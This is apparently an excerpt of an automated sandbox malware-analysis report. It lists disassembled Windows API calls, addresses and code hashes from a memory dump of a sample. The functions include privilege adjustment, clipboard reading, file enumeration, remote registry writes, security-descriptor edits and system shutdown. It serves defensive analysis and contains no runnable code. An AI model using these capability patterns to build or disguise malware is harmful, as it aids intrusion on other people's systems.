                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002DD5A1
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002DD5BB
                                                          • ReleaseCapture.USER32 ref: 002DD5C6
                                                          • GetCursorPos.USER32(?), ref: 002DD600
                                                          • ScreenToClient.USER32(?,?), ref: 002DD60D
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD669
                                                          • SendMessageW.USER32 ref: 002DD697
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD6D4
                                                          • SendMessageW.USER32 ref: 002DD703
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002DD724
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002DD733
                                                          • GetCursorPos.USER32(?), ref: 002DD753
                                                          • ScreenToClient.USER32(?,?), ref: 002DD760
                                                          • GetParent.USER32(?), ref: 002DD780
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD7E9
                                                          • SendMessageW.USER32 ref: 002DD81A
                                                          • ClientToScreen.USER32(?,?), ref: 002DD878
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002DD8A8
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD8D2
                                                          • SendMessageW.USER32 ref: 002DD8F5
                                                          • ClientToScreen.USER32(?,?), ref: 002DD947
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002DD97B
                                                            • Part of subcall function 002529AB: GetWindowLongW.USER32(?,000000EB), ref: 002529BC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002DDA17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 3977979337-4164748364
                                                          • Opcode ID: 98acb8ecf278a473501d2a2a9ff271fdbf6731e27b9d9e379475f7a0f3736eb0
                                                          • Instruction ID: a8279dc7e8df826b5dc910db656d4efc31daedd8da31a4641fc14595b2bb946a
                                                          • Opcode Fuzzy Hash: 98acb8ecf278a473501d2a2a9ff271fdbf6731e27b9d9e379475f7a0f3736eb0
                                                          • Instruction Fuzzy Hash: D9429D31214642AFD725DF28C888BAABBE5FF49310F14061AF599873A1C7B1DCA9CF51
                                                          APIs
                                                            • Part of subcall function 002A9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A93E3
                                                            • Part of subcall function 002A9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A9410
                                                            • Part of subcall function 002A9399: GetLastError.KERNEL32 ref: 002A941D
                                                          • _memset.LIBCMT ref: 002A8F71
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002A8FC3
                                                          • CloseHandle.KERNEL32(?), ref: 002A8FD4
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002A8FEB
                                                          • GetProcessWindowStation.USER32 ref: 002A9004
                                                          • SetProcessWindowStation.USER32(00000000), ref: 002A900E
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002A9028
                                                            • Part of subcall function 002A8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8F27), ref: 002A8DFE
                                                            • Part of subcall function 002A8DE9: CloseHandle.KERNEL32(?,?,002A8F27), ref: 002A8E10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                          • String ID: $default$winsta0
                                                          • API String ID: 2063423040-1027155976
                                                          • Opcode ID: e921b97e595c1ca06dd11ba0e2055bd518daed9a89b960c650a91c7241ff61d6
                                                          • Instruction ID: 8c3d283cd0d07de9310cfe50ff11e5f6c5f3274a8efb58d773075d2ce0247b06
                                                          • Opcode Fuzzy Hash: e921b97e595c1ca06dd11ba0e2055bd518daed9a89b960c650a91c7241ff61d6
                                                          • Instruction Fuzzy Hash: 51817B7182024ABFDF119FA5DC89AEEBB79EF05304F044159F918A6260DB718EA5DF20
                                                          APIs
                                                          • OpenClipboard.USER32(002E0980), ref: 002C465C
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 002C466A
                                                          • GetClipboardData.USER32(0000000D), ref: 002C4672
                                                          • CloseClipboard.USER32 ref: 002C467E
                                                          • GlobalLock.KERNEL32(00000000), ref: 002C469A
                                                          • CloseClipboard.USER32 ref: 002C46A4
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 002C46B9
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 002C46C6
                                                          • GetClipboardData.USER32(00000001), ref: 002C46CE
                                                          • GlobalLock.KERNEL32(00000000), ref: 002C46DB
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 002C470F
                                                          • CloseClipboard.USER32 ref: 002C481F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: 10b087922ebb3206914c0b1a5e0c8a5e163caa0dcb9b353a693513cc7af826b9
                                                          • Instruction ID: f7e8932ce7769249ecc6c081b27be4b6ca641720c60fb55c08a81d2609290e6c
                                                          • Opcode Fuzzy Hash: 10b087922ebb3206914c0b1a5e0c8a5e163caa0dcb9b353a693513cc7af826b9
                                                          • Instruction Fuzzy Hash: EA51B3312542425BD301FF60ECD9F6F73A8AF85B01F14062DF945D61D1DFB098668B66
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 002BF5F9
                                                          • _wcscmp.LIBCMT ref: 002BF60E
                                                          • _wcscmp.LIBCMT ref: 002BF625
                                                          • GetFileAttributesW.KERNEL32(?), ref: 002BF637
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 002BF651
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 002BF669
                                                          • FindClose.KERNEL32(00000000), ref: 002BF674
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 002BF690
                                                          • _wcscmp.LIBCMT ref: 002BF6B7
                                                          • _wcscmp.LIBCMT ref: 002BF6CE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BF6E0
                                                          • SetCurrentDirectoryW.KERNEL32(0030B578), ref: 002BF6FE
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF708
                                                          • FindClose.KERNEL32(00000000), ref: 002BF715
                                                          • FindClose.KERNEL32(00000000), ref: 002BF727
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*$S+
                                                          • API String ID: 1803514871-681589224
                                                          • Opcode ID: 58c970526b8bd066af27057f671a4f24b1ea0e1ecbe64a5a2b95b0446b2fcd19
                                                          • Instruction ID: ceaf43426f2cbb3598a63d1a1e170296dcac481f5406c6dc45400f89b7553f28
                                                          • Opcode Fuzzy Hash: 58c970526b8bd066af27057f671a4f24b1ea0e1ecbe64a5a2b95b0446b2fcd19
                                                          • Instruction Fuzzy Hash: 9731033169120A6BDB50DFB4EC8DEDEB3ACAF09361F1001A5E814D60A0DF70CAA5DA60
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002BCDD0
                                                          • FindClose.KERNEL32(00000000), ref: 002BCE24
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BCE49
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BCE60
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 002BCE87
                                                          • __swprintf.LIBCMT ref: 002BCED3
                                                          • __swprintf.LIBCMT ref: 002BCF16
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • __swprintf.LIBCMT ref: 002BCF6A
                                                            • Part of subcall function 002738C8: __woutput_l.LIBCMT ref: 00273921
                                                          • __swprintf.LIBCMT ref: 002BCFB8
                                                            • Part of subcall function 002738C8: __flsbuf.LIBCMT ref: 00273943
                                                            • Part of subcall function 002738C8: __flsbuf.LIBCMT ref: 0027395B
                                                          • __swprintf.LIBCMT ref: 002BD007
                                                          • __swprintf.LIBCMT ref: 002BD056
                                                          • __swprintf.LIBCMT ref: 002BD0A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: 1d537460f77b7acff35ad778084a0506fb6d80afbf0d63f0e14a2e26c9948de6
                                                          • Instruction ID: 763783a36d63a4b942932a09ac10b24453d15578746463ac99f8a32b269db190
                                                          • Opcode Fuzzy Hash: 1d537460f77b7acff35ad778084a0506fb6d80afbf0d63f0e14a2e26c9948de6
                                                          • Instruction Fuzzy Hash: D9A16DB1424340ABC710FFA4D885DAFB7ECEF94705F400919F985C6191EB70EA68CB62
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0FB3
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,002E0980,00000000,?,00000000,?,?), ref: 002D1021
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002D1069
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002D10F2
                                                          • RegCloseKey.ADVAPI32(?), ref: 002D1412
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 002D141F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: eaf991ead639d2bbaffc6459238ce88022eb9bc8cb4f6953f0b037834aa38e0a
                                                          • Instruction ID: 25906364b480170e2e1d8169f1c322b95c357c8f59a32253dcc1a66d0562340f
                                                          • Opcode Fuzzy Hash: eaf991ead639d2bbaffc6459238ce88022eb9bc8cb4f6953f0b037834aa38e0a
                                                          • Instruction Fuzzy Hash: 29025971220611AFCB14EF24C895A2AB7E5FF88714F04895DF8499B7A2CB30ED65CF91
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 002BF756
                                                          • _wcscmp.LIBCMT ref: 002BF76B
                                                          • _wcscmp.LIBCMT ref: 002BF782
                                                            • Part of subcall function 002B4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002B4890
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 002BF7B1
                                                          • FindClose.KERNEL32(00000000), ref: 002BF7BC
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 002BF7D8
                                                          • _wcscmp.LIBCMT ref: 002BF7FF
                                                          • _wcscmp.LIBCMT ref: 002BF816
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BF828
                                                          • SetCurrentDirectoryW.KERNEL32(0030B578), ref: 002BF846
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF850
                                                          • FindClose.KERNEL32(00000000), ref: 002BF85D
                                                          • FindClose.KERNEL32(00000000), ref: 002BF86F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*$j+
                                                          • API String ID: 1824444939-2224153375
                                                          • Opcode ID: 0b180a3f06872c0806c4c74e82bcf84add565531ccab2c5db85256d56d412056
                                                          • Instruction ID: 809ce0258856127ae3c2678728e57ccf2193459704ace79b02e14a0e0a8af99d
                                                          • Opcode Fuzzy Hash: 0b180a3f06872c0806c4c74e82bcf84add565531ccab2c5db85256d56d412056
                                                          • Instruction Fuzzy Hash: C331163155024BBBDB10DFB4EC8CADEB3ACDF09360F1001A5E804A61E1DB70CEA6DA60
                                                          APIs
                                                            • Part of subcall function 002A8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8E3C
                                                            • Part of subcall function 002A8E20: GetLastError.KERNEL32(?,002A8900,?,?,?), ref: 002A8E46
                                                            • Part of subcall function 002A8E20: GetProcessHeap.KERNEL32(00000008,?,?,002A8900,?,?,?), ref: 002A8E55
                                                            • Part of subcall function 002A8E20: HeapAlloc.KERNEL32(00000000,?,002A8900,?,?,?), ref: 002A8E5C
                                                            • Part of subcall function 002A8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8E73
                                                            • Part of subcall function 002A8EBD: GetProcessHeap.KERNEL32(00000008,002A8916,00000000,00000000,?,002A8916,?), ref: 002A8EC9
                                                            • Part of subcall function 002A8EBD: HeapAlloc.KERNEL32(00000000,?,002A8916,?), ref: 002A8ED0
                                                            • Part of subcall function 002A8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002A8916,?), ref: 002A8EE1
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002A8931
                                                          • _memset.LIBCMT ref: 002A8946
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002A8965
                                                          • GetLengthSid.ADVAPI32(?), ref: 002A8976
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 002A89B3
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002A89CF
                                                          • GetLengthSid.ADVAPI32(?), ref: 002A89EC
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002A89FB
                                                          • HeapAlloc.KERNEL32(00000000), ref: 002A8A02
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002A8A23
                                                          • CopySid.ADVAPI32(00000000), ref: 002A8A2A
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002A8A5B
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002A8A81
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002A8A95
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: c7436553266a126ba889657570b6dd315065c5dfdff4c24b4d6fa1f2eeb6f64b
                                                          • Instruction ID: 288c0d71b4c16f6529f5cd34d1088eb9499c4c892bac52e8e706a38f8e39baa4
                                                          • Opcode Fuzzy Hash: c7436553266a126ba889657570b6dd315065c5dfdff4c24b4d6fa1f2eeb6f64b
                                                          • Instruction Fuzzy Hash: 7F614A7195020AFFDF00DFA1EC89AAEBB79FF05300F04811AE855AA291DF719A15CB60
                                                          APIs
                                                            • Part of subcall function 002D147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0B0C
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002D0BAB
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002D0C43
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002D0E82
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 002D0E8F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: 2ee032ce104623a596c8453cc5fa6b6ebdf8fcaf656ec61752f2a4f5dad8c67c
                                                          • Instruction ID: f03ed558ca3e1000eddde1b26ae8315eeb43a1cd8552652304f527bfd6fc0c19
                                                          • Opcode Fuzzy Hash: 2ee032ce104623a596c8453cc5fa6b6ebdf8fcaf656ec61752f2a4f5dad8c67c
                                                          • Instruction Fuzzy Hash: A0E16D31224211AFCB14DF24C895E2ABBE5EF89714F04896EF849DB361DA30ED55CF51
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 002B4451
                                                          • __swprintf.LIBCMT ref: 002B445E
                                                            • Part of subcall function 002738C8: __woutput_l.LIBCMT ref: 00273921
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 002B4488
                                                          • LoadResource.KERNEL32(?,00000000), ref: 002B4494
                                                          • LockResource.KERNEL32(00000000), ref: 002B44A1
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 002B44C1
                                                          • LoadResource.KERNEL32(?,00000000), ref: 002B44D3
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 002B44E2
                                                          • LockResource.KERNEL32(?), ref: 002B44EE
                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002B454F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                          • String ID:
                                                          • API String ID: 1433390588-0
                                                          • Opcode ID: 86bbd1f640234006a85dd50f78be1e9e16340317f1690b88d56ee735c02551f0
                                                          • Instruction ID: 9a85e6a5ca379e780e1a65b543a509997cab5a5ae86471ce6793aa068a40077f
                                                          • Opcode Fuzzy Hash: 86bbd1f640234006a85dd50f78be1e9e16340317f1690b88d56ee735c02551f0
                                                          • Instruction Fuzzy Hash: 9231A07151125BABCB11AF60ECC8EFB7BBDEB04340F408415F916D6151D774D961CB60
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 53a96e3cc3b26cb9726319d4a8b9325b43093ead295b835f42e97af18b03919d
                                                          • Instruction ID: 4fd7a74902febe6ab232ae0502972ed733afbe27db90581d7797cc80d9c8f091
                                                          • Opcode Fuzzy Hash: 53a96e3cc3b26cb9726319d4a8b9325b43093ead295b835f42e97af18b03919d
                                                          • Instruction Fuzzy Hash: 3321A1312512119FDB01BF60EC9DF6E77B8EF44725F048119F9069B2A1CBB0AD628F94
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002BFA83
                                                          • FindClose.KERNEL32(00000000), ref: 002BFB96
                                                            • Part of subcall function 002552B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002552E6
                                                          • Sleep.KERNEL32(0000000A), ref: 002BFAB3
                                                          • _wcscmp.LIBCMT ref: 002BFAC7
                                                          • _wcscmp.LIBCMT ref: 002BFAE2
                                                          • FindNextFileW.KERNEL32(?,?), ref: 002BFB80
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 2185952417-438819550
                                                          • Opcode ID: eb37991ca7908dcab7dfcf65e27d1a6b73d8b0cc9d56e82dcb855f1afc8827d6
                                                          • Instruction ID: 85f7abccd477c1b42e4a1275cf950f25736dd7247a3de515371ed40135f593f5
                                                          • Opcode Fuzzy Hash: eb37991ca7908dcab7dfcf65e27d1a6b73d8b0cc9d56e82dcb855f1afc8827d6
                                                          • Instruction Fuzzy Hash: 7C41B67196021A9FCF54DF64CD99AEEBBB4FF09350F14806AE814A7191EB309EA4CF50
                                                          APIs
                                                            • Part of subcall function 002A9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A93E3
                                                            • Part of subcall function 002A9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A9410
                                                            • Part of subcall function 002A9399: GetLastError.KERNEL32 ref: 002A941D
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 002B57B4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
